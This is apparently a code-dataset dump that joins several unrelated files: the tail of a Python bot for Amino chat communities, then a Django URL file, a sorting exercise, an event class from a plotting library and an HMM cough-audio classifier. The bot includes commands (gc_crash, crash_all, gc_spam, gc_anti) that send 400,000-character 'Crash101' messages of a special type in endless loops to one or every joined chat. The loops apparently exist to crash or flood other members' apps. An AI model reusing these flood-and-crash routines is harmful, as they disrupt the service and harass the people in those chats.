win2:\n\t\tsubClient.send_message(chatId=chatId, message=f\"[bcu]{msg[1]} winnerr\")\n\telif win1 < win2:\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[bcu]{msg[2]} winnerrrr!!\")\n\telif win1 == win2:\n\t\tsubClient.send_message(chatId=chatId, message=f\"[iC]victory.\")\n\n\ndef ship(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tcasal = message + \" null null \"\n\tpessoas = casal.split(\" \")\n\tporcentagem = uniform(0, 100)\n\tquote = ' '\n\tif porcentagem <= 10:\n\t\tquote = 'Sem chance.'\n\telif 10 <= porcentagem <= 25:\n\t\tquote = 'Eh...'\n\telif 25 <= porcentagem <= 50:\n\t\tquote = 'zada nahi chalega'\n\telif 50 <= porcentagem <= 75:\n\t\tquote = 'bonds ❤'\n\telif 75 <= porcentagem <= 100:\n\t\tquote = 'pure love❤'\n\tsubClient.send_message(\n\t chatId=chatId,\n\t message=f\"{pessoas[0]} x {pessoas[1]} tem {porcentagem:.2f}% \"\n\t f\"chances of getting in relation.\")\n\tsubClient.send_message(chatId=chatId, message=quote)\n\ttry:\n\t\tvalue = int(''.join(open(\"value\", 'r').readlines()))\n\texcept:\n\t\tpass\n\ttry:\n\t\tvalue = value + 1\n\texcept:\n\t\tpass\n\n\ndef Youtube(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmsg = \" \".join(message.strip().split()[:-1])\n\t\tsearch = msg\n\texcept ValueError:\n\t\tsize = 1\n\t\tsearch = message\n\tif size > 5:\n\t\tsize = 5\n\tresults = YoutubeSearch(search, max_results=size).to_json()\n\t# pprint(results)\n\tresults = YoutubeSearch(search, max_results=size).to_dict()\n\tyt_reply = \"\"\n\tpprint(results)\n\tfor result in results:\n\t\ttitle = result['title']\n\t\tthumbnails = result['thumbnails'][0]\n\t\tyt_url = 'https://youtu.be/' + result['url_suffix']\n\t\tdr = result['duration']\n\t\tviews = result['views']\n\t\tyt_reply = yt_reply + str(title) + \"\\nViews: \" + str(\n\t\t views) + \"\\nDuration: \" + str(dr) + \"\\n\" + str(yt_url) + \"\\n\\n\"\n\twith suppress(Exception):\n\t\tsubClient.send_message(chatId=chatId, message=yt_reply)\n\tfor result in results:\n\t\tyt_url = 'https://youtu.be/' + result['url_suffix']\n\t\tconvert(subClient, chatId, authorId, author, message=yt_url)\n\n\ndef welcome_channel(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.set_welcome_chat(chatId)\n\t\tsubClient.send_message(chatId, \"Welcome channel set!\")\n\n\ndef get_stick(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tdata = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId) # message\n\n\treply_message = data.json['extensions']\n\tif reply_message:\n\t\timage = data.json['extensions']['replyMessage']['extensions'][\n\t\t 'sticker']['icon']\n\t\tprint(\"\\n\\nurl\", image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\tfiletype = image.split(\".\")[-1]\n\t\tif filetype != \"gif\":\n\t\t\tfiletype = \"image\"\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=filetype)\n\t\t\t\tprint(os.remove(filename))\n\n\ndef unwelcome_channel(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.unset_welcome_chat()\n\t\tsubClient.send_message(chatId, \"Welcome channel unset!\")\n\n\ndef gc_crash(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Crash101\" * 50000\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsubClient.send_message(chatId, c, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef safe_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Don't scroll up\" * 200\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = subClient.subclient.get_chat_threads().chatId\n\t\tfor i in range(1, 2):\n\t\t\tfor chat in chatId_list:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.send_message(chat, c, messageType=0)\n\n\ndef crash_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Crash101\" * 50000\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = subClient.subclient.get_chat_threads().chatId\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tfor chat in chatId_list:\n\t\t\t\t\twith suppress(Exception):\n\t\t\t\t\t\tsubClient.send_message(chat, c, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef send_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = subClient.subclient.get_chat_threads().chatId\n\t\tfor chat in chatId_list:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chat, message, messageType=0)\n\n\ndef gc_anti(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Don't scroll up\" * 200\n\tchatid = client.get_from_code(message).objectId\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tfor i in range(1, 3):\n\t\t\tsubClient.send_message(chatid, c, messageType=0)\n\n\ndef gc_spam(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsubClient.send_message(chatId, message, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef get_bg(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\timage = subClient.subclient.get_chat_thread(chatId).backgroundImage\n\tif image is not None:\n\t\tprint(image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef trans_reply(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tdata = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId) # message\n\treply_message = data.json['extensions']\n\tif reply_message:\n\t\treply_message = data.json['extensions']['replyMessage']['content']\n\t\treply_messageId = data.json['extensions']['replyMessage']['messageId']\n\t\ttranslator = google_translator()\n\t\tdetect_result = translator.detect(reply_message)[1]\n\t\ttranslate_text = translator.translate(reply_message)\n\t\treply = \"[IC]\" + str(\n\t\t translate_text) + \"\\n\\n[c]Translated Text from \" + str(\n\t\t detect_result)\n\t\tsubClient.send_message(chatId, reply, replyTo=reply_messageId)\n\n\ndef level(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\ttry:\n\t\t\tmessage = int(message)\n\t\texcept Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, wrong level\")\n\t\t\treturn\n\t\tif message > 20:\n\t\t\tmessage = 20\n\t\tif message < 0:\n\t\t\tmessage = 0\n\t\tsubClient.set_level(message)\n\t\tsubClient.send_message(chatId, f\"Level set to {message}!\")\n\n\ndef taxe(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tcoins = subClient.get_wallet_amount()\n\t\tif coins >= 1:\n\t\t\tamt = 0\n\t\t\twhile coins > 500:\n\t\t\t\tsubClient.pay(500, chatId=chatId)\n\t\t\t\tcoins -= 500\n\t\t\t\tamt += 500\n\t\t\tsubClient.pay(int(coins), chatId=chatId)\n\t\t\tsubClient.send_message(chatId, f\"Sending {coins+amt} coins...\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, \"Account is empty!\")\n\n\ncommands_dict = {\n \"help\": helper,\n \"src\": src,\n \"copychat\": chat_copy,\n \"com\": vc_com,\n \"live\": global_invite,\n \"startvc\": start_vc,\n \"endvc\": end_vc,\n \"hh\": hh,\n \"vc\": join_vc,\n \"pvp\": pvp,\n \"ship\": ship,\n \"hh\": hh,\n \"day\": day,\n \"bclear\": bot_clear,\n \"profile\": profile,\n \"yt\": Youtube,\n \"editicon\": edit_icon,\n \"mentionall\": new_mention_all,\n \"ban\": ban,\n \"editbio\": edit_bio,\n \"editname\": edit_name,\n \"gspam\": gc_spam,\n \"get\": get_stick,\n \"achat\": gc_anti,\n \"gif\": gif_search,\n \"img\": img_search,\n \".\": gc_crash,\n \"gcrash\": crash_all,\n \"guard\": safe_all,\n \"bg\": get_bg,\n \"a\": send_all,\n \"title\": title,\n \"dice\": dice,\n \"tr\": trans_reply,\n \"join\": join,\n \"level\": level,\n \"give\": cus_k,\n \"leave\": leave,\n \"abw\": add_banned_word,\n \"rbw\": remove_banned_word,\n \"bwl\": banned_word_list,\n \"llock\": locked_command_list,\n \"view\": read_only,\n \"taxe\": taxe,\n \"clear\": clear,\n \"joinall\": join_all,\n \"leaveall\": leave_all,\n \"reboot\": reboot,\n \"stop\": stop,\n \"spam\": spam,\n \"mention\": mention,\n \"msg\": msg,\n \"alock\": admin_lock_command,\n \"uinfo\": uinfo,\n \"cinfo\": cinfo,\n \"joinamino\": join_amino,\n \"chatlist\": get_chats,\n \"sw\": sw,\n \"accept\": accept,\n \"chat_id\": chat_id,\n \"prank\": prank,\n \"prefix\": prefix,\n \"allock\": locked_admin_command_list,\n \"leaveamino\": leave_amino,\n \"sendinfo\": sendinfo,\n \"image\": image,\n \"all\": mentionall,\n \"block\": block,\n \"unblock\": unblock,\n \"follow\": follow,\n \"unfollow\": unfollow,\n \"unwelcome\": unwelcome_channel,\n \"stop_amino\": stop_amino,\n \"block\": block,\n \"unblock\": unblock,\n \"welcome\": welcome_channel,\n \"ask\": ask_thing,\n \"askstaff\": ask_staff,\n \"lock\": lock_command,\n \"unlock\": unlock_command,\n \"global\": get_global,\n \"heavydriver\": audio,\n \"convert\": convert,\n \"say\": say,\n \"keepu\": keep_favorite_users,\n \"unkeepu\": unkeep_favorite_users,\n \"keepc\": keep_favorite_chats,\n \"unkeepc\": unkeep_favorite_chats\n}\n\nhelpMsg = f\"\"\"\n[CB]-- COMMON COMMAND --\n\n★ help (command)\t: show this or the help associated to the command\n★ title (title)\t: edit titles*\n★ dice (xdy)\t: return x dice y (1d20) per default\n★ join (chat)\t: join the specified channel\n★ mention (user)\t: mention an user\n★ spam (amount)\t: spam an message (limited to 3)\n★ msg (type)\t: send a \"special\" message (limited to 3)\n★ bwl\t: the list of banneds words*\n★ llock\t: the list of locked commands\n★ chatlist\t: the list of public chats\n★ global (link)\t: give the global profile of the user\n★ leave\t: leave the current channel\n★ follow\t: follow you\n★ unfollow\t: unfollow you\n★ convert (url)\t: will convert and send the music from the url (9 min max)\n★ pvp: mention 2 user for fight\n★ ship: mention 2 user for ship\n★ prank (amount)\t will send coins\n★ src (search)\t for search\n★ image\t: will send an image\n★ say\t: will say the message in audio\n★ gif(text)\t: will send a gif\n★ give\t: gives you anything\n★ bg\t:gives bg of chat\n★ tr :translate word by replying\n★ get : get image or gif of ghe sticker\n\"\"\"\n\nstaff = \"\"\"\n[CB]-- STAFF COMMAND --\n\n• accept\\t: accept the staff role\n• abw (word list)\\t: add a banned word to the list*\n• rbw (word list)\\t: remove a banned word from the list*\n• sw (message)\\t: set the welcome message for new members (will start as soon as the welcome message is set)\n• welcome\\t: set the welcome channel**\n• unwelcome\\t: unset the welcome channel**\n• ask (message)(lvl=)\\t: ask to all level (lvl) something**\n• clear (amount)\\t: clear the specified amount of message from the chat (max 50)*\n• joinall\\t: join all public channels\n• leaveall\\t: leave all public channels\n• leaveamino\\t: leave the community\n• all\\t: mention all the users of a channel\n• lock (command)\\t: lock the command (nobody can use it)\n• unlock (command)\\t: remove the lock for the command\n• view\\t: set or unset the current channel to read-only\n• prefix (prefix)\\t: set the prefix for the amino\n• level (level)\\t: set the level required for the commands\n• keepu (user)\\t: keep in favorite an user*\n• unkeepu (user)\\t: remove from favorite an user*\n• keepc (chat)\\t: keep in favorite a chat*\n• unkeepc (chat)\\t: remove from favorite a chat*\n\"\"\"\n\nhelpAsk = \"\"\"\nExample :\n- !ask Hello! Can you read this : [poll | http://aminoapp/poll]? Have a nice day!^^ lvl=6\n\"\"\"\n\ntry:\n\twith open(path_config, \"r\") as file:\n\t\tdata = load(file)\n\t\tperms_list = data[\"admin\"]\n\t\tcommand_lock = data[\"lock\"]\n\t\tdel data\nexcept FileNotFoundError:\n\twith open(path_config, 'w') as file:\n\t\tfile.write(dumps({\"admin\": [], \"lock\": []}, indent=4))\n\tprint(\n\t \"Created config.json!\\nYou should put your Amino Id in the list admin\\nand the commands you don't want to use in lock\"\n\t)\n\tperms_list = []\n\tcommand_lock = []\n\ntry:\n\twith open(path_client, \"r\") as file_:\n\t\tlogin = file_.readlines()\nexcept FileNotFoundError:\n\twith open(path_client, 'w') as file_:\n\t\tfile_.write('email\\npassword')\n\tprint(\"Please enter your email and password in the file client.txt\")\n\tprint(\"-----end-----\")\n\tsys.exit(1)\n\nidentifiant = login[0].strip()\nmdp = login[1].strip()\n\nclient = Client()\nclient.login(email=identifiant, password=mdp)\nbotId = client.userId\namino_list = client.sub_clients()\n\ncommunaute = {}\ntaille_commu = 0\n\nfor command in command_lock:\n\tif command in commands_dict.keys():\n\t\tdel commands_dict[command]\n\n\ndef tradlist(sub):\n\tsublist = []\n\tfor elem in sub:\n\t\twith suppress(Exception):\n\t\t\tval = client.get_from_code(\n\t\t\t f\"http://aminoapps.com/u/{elem}\").objectId\n\t\t\tsublist.append(val)\n\t\t\tcontinue\n\t\twith suppress(Exception):\n\t\t\tval = client.get_user_info(elem).userId\n\t\t\tsublist.append(val)\n\t\t\tcontinue\n\treturn sublist\n\n\nperms_list = tradlist(perms_list)\n\n\ndef threadLaunch(commu):\n\twith suppress(Exception):\n\t\tcommi = BotAmino(client=client, community=commu)\n\t\tcommunaute[commi.community_id] = commi\n\t\tcommunaute[commi.community_id].run()\n\n\ntaille_commu = len([\n Thread(target=threadLaunch, args=[commu]).start()\n for commu in amino_list.comId\n])\n\n\ndef filtre_message(message, code):\n\tpara = normalize('NFD',\n\t message).encode(code,\n\t 'ignore').decode(\"utf8\").strip().lower()\n\tpara = para.translate(str.maketrans(\"\", \"\", punctuation))\n\treturn para\n\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tmessage = data.message.content\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\tif not (is_it_me(authorId) or is_it_admin(authorId)\n\t or is_it_bot(authorId)) and not subClient.is_in_staff(\n\t authorId) and subClient.banned_words:\n\t\twith suppress(Exception):\n\t\t\tpara = filtre_message(message, \"ascii\").split()\n\n\t\t\tif para != [\"\"]:\n\t\t\t\tfor elem in para:\n\t\t\t\t\tif elem in subClient.banned_words:\n\t\t\t\t\t\tsubClient.delete_message(chatId,\n\t\t\t\t\t\t messageId,\n\t\t\t\t\t\t \"Banned word\",\n\t\t\t\t\t\t asStaff=True)\n\t\t\t\t\t\treturn\n\n\t\twith suppress(Exception):\n\t\t\tpara = filtre_message(message, \"utf8\").split()\n\n\t\t\tif para != [\"\"]:\n\t\t\t\tfor elem in para:\n\t\t\t\t\tif elem in subClient.banned_words:\n\t\t\t\t\t\tsubClient.delete_message(chatId,\n\t\t\t\t\t\t messageId,\n\t\t\t\t\t\t \"Banned word\",\n\t\t\t\t\t\t asStaff=True)\n\t\t\t\t\t\treturn\n\n\tif message.startswith(subClient.prefix) and not is_it_bot(authorId):\n\t\tauthor = data.message.author.nickname\n\t\tcommande = \"\"\n\t\tmessage = str(message).strip().split(communaute[commuId].prefix,\n\t\t 1).pop()\n\t\tcommande = str(message).strip().split(\" \", 1)[0].lower()\n\t\tif commande in subClient.locked_command and not (\n\t\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\treturn\n\t\tif commande in subClient.admin_locked_command and not (\n\t\t is_it_me(authorId) or is_it_admin(authorId)):\n\t\t\treturn\n\t\tif not subClient.is_level_good(authorId) and not (\n\t\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\tsubClient.send_message(\n\t\t\t chatId,\n\t\t\t f\"You don't have the level for that ({subClient.level})\")\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = str(message).strip().split(\" \", 1)[1]\n\t\texcept Exception:\n\t\t\tmessage = \"\"\n\telse:\n\t\treturn\n\n\twith suppress(Exception):\n\t\t[\n\t\t Thread(\n\t\t target=values,\n\t\t args=[subClient, chatId, authorId, author, message,\n\t\t messageId]).start()\n\t\t for key, values in commands_dict.items()\n\t\t if commande == key.lower()\n\t\t]\n\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\tcommuId = data.json[\"ndcId\"]\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\n\texcept Exception:\n\t\treturn\n\tchatId = data.message.chatId\n\tcontent = data.message.content\n\tif \"uwu\" in content or \"owo\" in content:\n\t\tval = os.listdir(path_picture)\n\t\tprint(\"VAL:\", val)\n\t\tif val:\n\t\t\tfile = choice(val)\n\t\t\tprint(\"File\", file)\n\t\t\twith suppress(Exception):\n\t\t\t\twith open(path_picture + \"/\" + file, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, \"Error! No file\")\n\n\n@client.event(\"on_image_message\")\ndef on_image_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\n@client.event(\"on_voice_message\")\ndef on_voice_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\n@client.event(\"on_sticker_message\")\ndef on_sticker_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\n\n@client.event(\"on_chat_invite\")\ndef on_chat_invite(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\n\tsubClient.join_chat(chatId=chatId)\n\tsubClient.send_message(\n\t chatId,\n\t f\"Hello!\\nI am a bot, if you have any question ask a staff member!^^\\nHow can I help you? (you can do {subClient.prefix}help for help)\"\n\t)\n\n\n@client.event(\"on_chat_tip\")\ndef on_chat_tip(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\traw_data = data.json\n\tnick_name = raw_data['chatMessage']['author']['nickname']\n\tcoins = raw_data['chatMessage']['extensions']['tippingCoins']\n\tchatId = raw_data['chatMessage']['threadId']\n\treply = \"[C]Thanks for \" + str(coins) + \" Props \\n\\n[C]\" + str(nick_name)\n\tprint(raw_data)\n\tprint(\"chatId\", chatId)\n\tsubClient.send_message(chatId=chatId, message=reply)\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tcontent = data.message.content\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\ttry:\n\t link=content.split()[1]\n\texcept:\n\t pass\n\tmessageId = data.message.messageId\n\tif \"aminoapps.com/c\" in content or \"aminoapps.com/p\" in content or \"aminoapps.com/c\" in link or \"aminoapps.com/p\" in link:\n\t try:\n\t info = client.get_from_code(content)\n\t except:\n\t info=client.get_from_code(link)\n\t \n\t s=subClient.community_id\n\t comId = info.path[1:info.path.index(\"/\")]\n\t if comId != f'{commuId}':\n\t subClient.delete_message(chatId=data.message.chatId,messageId=data.message.messageId,asStaff=True,reason=\"link share\")\n\t subClient.subclient.warn(userId=data.message.author.userId,reason=\"Sending links of other community\")\n\n\ndef upload(url):\n\tlink = requests.get(url)\n\tresult = BytesIO(link.content)\n\treturn result\n\n\n@client.event('on_group_member_join')\ndef on_group_member_join(data):\n\tcommuId = data.json[\"ndcId\"]\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\t\tprint(\"comm ID\", commuId)\n\n\texcept Exception:\n\t\treturn\n\tnick = data.message.author.nickname\n\tsubClient.subclient.send_message(message=' ✧ Welcome ✧',\n\t chatId=data.message.chatId,\n\t embedTitle=data.message.author.nickname,\n\t embedImage=upload(\n\t data.message.author.icon))\n\n\nfrom time import sleep\n\n\ndef reconsocketloop():\n\twhile True:\n\t\tclient.close()\n\t\tclient.start()\n\t\tsleep(120)\n\n\nsocketloop = threading.Thread(target=reconsocketloop, daemon=True)\nsocketloop.start()","sub_path":"Community.py","file_name":"Community.py","file_ext":"py","file_size_in_byte":92926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28565467","text":"\nfrom django.conf.urls import url\nfrom . import views # This line is new!\nurlpatterns = [\n\turl(r'^$', views.index), # Root route\n url(r'^process/register$', views.registerUser),\n url(r'^process/login$', views.loginUser),\n url(r'^process/logout$', views.logout),\n url(r'^success$', views.success)\n]\n","sub_path":"main/apps/first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585426443","text":"# 10814번\n# https://yoonsang-it.tistory.com/\n\nn = int(input())\nuser_list = []\n\nfor i in range(n):\n user = input().split()\n user.append(i)\n user_list.append(user)\n\nsorted_list = sorted(user_list, key=lambda x : (int(x[0]), x[2]))\nfor i in range(len(sorted_list)):\n answer = \" \".join(sorted_list[i][:2])\n print(answer)","sub_path":"backjoon_python/back114.py","file_name":"back114.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"194437357","text":"# Created byMartin.cz\n# Copyright (c) Martin Strohalm. All rights reserved.\n\nfrom .. enums import *\nfrom . event import Event\n\n\nclass PropertyChangedEvt(Event):\n \"\"\"\n Defines an event which is fired if any property of a pero.PropertySet\n was changed.\n \n Attributes:\n \n name: str\n Name of the changed property.\n \n old_value: any\n Original value.\n \n new_value: any\n New value.\n \"\"\"\n \n TYPE = EVT_PROPERTY_CHANGED\n \n \n def __init__(self, **kwargs):\n \"\"\"Initializes a new instance of PropertyChangedEvt.\"\"\"\n \n self.name = None\n self.old_value = None\n self.new_value = None\n \n super().__init__(**kwargs)\n \n \n @classmethod\n def from_evt(cls, evt):\n \"\"\"\n Initializes a new instance of given class by copying all current data.\n \n Args:\n evt: pero.PropertyChangedEvt\n Source event from which to copy the data.\n \n Returns:\n cls instance\n New instance of requested class.\n \"\"\"\n \n return cls(\n name = evt.name,\n old_value = evt.old_value,\n new_value = evt.new_value)\n","sub_path":"pero/events/prop.py","file_name":"prop.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638940983","text":"#Commented file \nimport os\nimport argparse \n\nfrom scipy.io import wavfile \n\nfrom python_speech_features import mfcc\nfrom joblib import dump,load \n\nimport numpy as np\nimport sounddevice as sd\nimport queue\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport soundfile as sf\nimport HMM #self define module\nimport psutil\nfrom memory_profiler import profile\n\n\n\ntest_folder=\"./WenReiCough/Cough/\"\n\nAUDIO_DEVICE='Microphone (Realtek(R) Audio), Windows DirectSound'\nSAMPLING_RATE = 8000\n#default block size is 2048\n#BLOCK_SIZE=2048 #if is too small it print 0\naudio_queue = queue.Queue()\n\ndef capture_audio(block, block_len, time, status):\n\n audio_queue.put(block.copy())\n #print(block_len)\n\n\n# Function to parse input arguments\ndef build_arg_parser():\n parser = argparse.ArgumentParser(description='Trains the HMM classifier')\n #./name/\n parser.add_argument(\"-i\",\"--input-audiodirectory\", dest=\"input_folder\", required=True,\n help=\"Input folder containing the audio files in subfolders\")\n parser.add_argument(\"-o\",\"--model\",dest=\"model\",required=False,\n help=\"HMM Model Filename\") \n return parser\n\n#if __name__=='__main__':\n@profile(precision=3)\ndef main():\n args = build_arg_parser().parse_args()\n input_folder = args.input_folder\n\n hmm_models = []\n\n # Training Folder\n for dirname in os.listdir(input_folder) :\n if os.path.isdir(input_folder+dirname)==True:\n # SubFolder full path \n subfolder = os.path.join(input_folder, dirname)\n # Extract the label\n label = dirname\n # Initialize Variables\n all_mfcc_features = np.array([])\n labels = []\n cnt=0\n for i,audio in enumerate(sorted(os.listdir(subfolder))):\n \n if audio[-3:] == 'wav'or 'mp3':\n # Read the input file\n filepath = os.path.join(subfolder,audio)\n #print(audio[-3:])\n sampling_freq, data = wavfile.read(filepath)\n\n # Extract MFCC features in 1 audio, default nfft=512, \n #AppendEnergy - replace the 0th MFCC to the log(total frame Energy)\n mfcc_features = mfcc(data, sampling_freq,appendEnergy=True)\n #print(mfcc_features.shape)\n \n # Extract MFCC features in all audios (2D array)\n if all_mfcc_features.size == 0:\n all_mfcc_features = mfcc_features[:,1:]\n #print(all_mfcc_features.shape)\n else:\n all_mfcc_features = np.append(all_mfcc_features, mfcc_features[:,1:], axis=0)\n cnt=i\n # Append the label\n labels.append(label)\n else:\n raise Exception(\"Not an audio file\")\n #print(i)\n print(label, \"File Count:\",cnt+1)\n print ('all_mfcc_features.shape =', all_mfcc_features.shape)\n # Train and save HMM model\n hmm_trainer = HMM.TrainHMM()\n hmm_trainer.train(all_mfcc_features)\n hmm_models.append((hmm_trainer, label))\n \n hmm_trainer = None\n else:\n raise Exception(\"Training Subfolder doesn't exist\")\n \n if args.model.endswith(\".joblib\")==True:\n dump(hmm_models,args.model)\n else:\n dump(hmm_models,args.model+\".joblib\")\n\n \n \n input_files=[]\n\n for x in os.listdir(test_folder):\n input_files.append(test_folder+x)\n \n # Classify input data\n for input_file in input_files:\n # Read input file\n sampling_freq, audio = wavfile.read(input_file)\n #print('Wav Audio',audio.shape)\n # Extract MFCC features\n mfcc_features = mfcc(audio, sampling_freq,appendEnergy=True)\n print(mfcc_features[:,1:].shape)\n # Define variables\n max_score = -100000\n output_label = None\n\n # Iterate through all HMM models and pick \n # the one with the highest score\n for item in hmm_models:\n hmm_model, label = item\n score = hmm_model.hmm_score(mfcc_features[:,1:])\n print(score)\n if score > max_score:\n max_score = score\n output_label = label\n\n # Print the output\n print (\"True:\", input_file[input_file.find('\\\\')+1:input_file.rfind('\\\\')])\n print (\"Predicted:\", output_label) \n #print(psutil.virtual_memory())\n\nif __name__=='__main__':\n main()","sub_path":"2_traincoughHMM.py","file_name":"2_traincoughHMM.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522021652","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 